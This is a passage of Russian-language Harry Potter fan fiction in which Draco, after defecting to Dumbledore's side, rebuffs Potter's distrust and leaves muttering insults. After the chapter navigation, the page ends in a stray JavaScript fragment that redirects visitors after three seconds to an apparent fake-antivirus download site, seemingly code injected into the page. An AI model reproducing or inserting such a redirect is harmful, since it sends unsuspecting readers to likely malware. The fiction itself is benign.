- Ты и не должен мне доверять. Я не на твоей стороне, - мягко произнес Драко, зная, что Поттер, скорее всего, мало что поймет. Неважно. Он наверняка потом спросит Грейнджер. – Смерть Волдеморта ничего не изменит между сторонниками Мерлина и последователями Морганы. Когда эта битва закончится, война будет бушевать еще тысячу лет.

Уже совершенно не чувствуя голода, Драко поднялся и подошел к стене, через которую вошел гриффиндорец. Он не собирался выдавать слизеринский проход на кухню.

- Подожди, - удивленно окликнул его Поттер. – О чем ты говоришь? Ведь все это началось с  Волдеморта!

- Если ты так думаешь, - холодно произнес Драко, - может, тебе стоит поучить историю, а не спать во время занятий, - он выскользнул из кухни, не забыв посмотреть, за какой картиной скрывается вход. Отойдя подальше, он замедлил шаг и плотнее запахнул мантию. В коридоре горело всего несколько факелов и воздух был таким холодным, что можно было  видеть белые облачка дыхания.

Драко знал, что не должен был терять терпение, или, как сказал бы Северус, позволять дурацкой Малфоевской гордости взять над ним верх. Естественно, Поттер не станет ему доверять. Люциус подчинялся Волдеморту долгие годы, а Драко во всем повиновался отцу. Было глупо полагать, что внезапный переход на сторону Дамблдора поможет юному Малфою заслужить уважение в близоруких глазах Мальчика-который-выжил. Но во что им обошлось это решение? Они потеряли дом и всякую надежду на нормальную жизнь на долгие годы вперед. Неужели это ничего не значит? Даже Дамблдор поверил Драко и то, что Поттер не доверял мнению старого волшебника, казалось неоправданно жестоким.

- Не очень-то похоже на послушного маленького гриффиндорца, - пробормотал юноша себе под нос. – Тупой шрамоголовый идиот. Не знает даже кто такой Мордред. Магглолюбивый невежда. Ручаюсь, он не прочел ни одной книги кроме учебников. Наверное, списывает все у Грейнджер.

Подходя к гостиной, он все еще ругался.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>